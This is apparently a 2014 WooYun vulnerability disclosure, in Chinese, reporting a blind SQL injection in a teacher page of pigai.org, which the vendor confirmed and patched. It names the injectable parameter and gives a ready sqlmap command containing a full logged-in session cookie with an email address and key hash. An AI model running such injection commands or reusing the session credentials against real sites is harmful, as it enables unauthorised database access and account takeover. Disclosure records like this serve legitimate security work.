漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-074079
漏洞标题:句酷批改网主站SQL盲注
相关厂商:pigai.org
漏洞作者: 进击的zjx
提交时间:2014-08-27 17:19
修复时间:2014-10-11 17:20
公开时间:2014-10-11 17:20
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-08-27: 细节已通知厂商并且等待厂商处理中
2014-08-27: 厂商已经确认,细节仅向厂商公开
2014-09-06: 细节向核心白帽子及相关领域专家公开
2014-09-16: 细节向普通白帽子公开
2014-09-26: 细节向实习白帽子公开
2014-10-11: 细节向公众公开
简要描述:
首先,句酷管理员跟我联系了,说下午有个天津的IP在扫他们,所以把IP给封了,很可能是审核大人的。。。请您换个IP,跑我给您的地址吧
详细说明:
首先说明是可以连上的,连不上是因为IP被封了
http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5 ID是注入点
再次申明,需要登陆教师身份,才可以连接上
我直接给您cookie
sqlmap.py -u "http://www.pigai.org/index.php?c=teacher&a=requestviewall&sts=2&id=5" --cookie "old=2011; _JUKU_USER=%7B%22i%22%3A%222648072%22%2C%22u%22%3A%22testxss2%40126.com%22%2C%22u2%22%3A%22%5Cu5f20%5Cu5206%22%2C%22k%22%3A%220fad2b75cb8020f7118233a21042cebd%22%2C%22img%22%3A%22%22%2C%22ts%22%3A1%2C%22s%22%3A%22%5Cu6e05%5Cu534e%5Cu5927%5Cu5b66%22%7D; _JKU=testxss2%40126.com; pgv_pvi=3833861510; Hm_lvt_3f46f9c09663bf0ac2abdeeb95c7e516=1408948744,1409040414,1409055933; old=2011; Hm_lpvt_3f46f9c09663bf0ac2abdeeb95c7e516=1409110501; _JUKU_USER=%7B%22i%22%3A%222648072%22%2C%22u%22%3A%22testxss2%40126.com%22%2C%22u2%22%3A%22%5Cu5f20%5Cu5206%22%2C%22k%22%3A%220fad2b75cb8020f7118233a21042cebd%22%2C%22img%22%3A%22%22%2C%22ts%22%3A1%2C%22s%22%3A%22%5Cu6e05%5Cu534e%5Cu5927%5Cu5b66%22%7D; _JKU=testxss2%40126.com"
dba权限,不继续跑了
漏洞证明:
如上
修复方案:
你们家的最后一个SQL注入啦,请高rank走起
版权声明:转载请注明来源 进击的zjx@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-08-27 17:23
厂商回复:
没有通过的时候,已经补上了,礼物照常有
最新状态:
暂无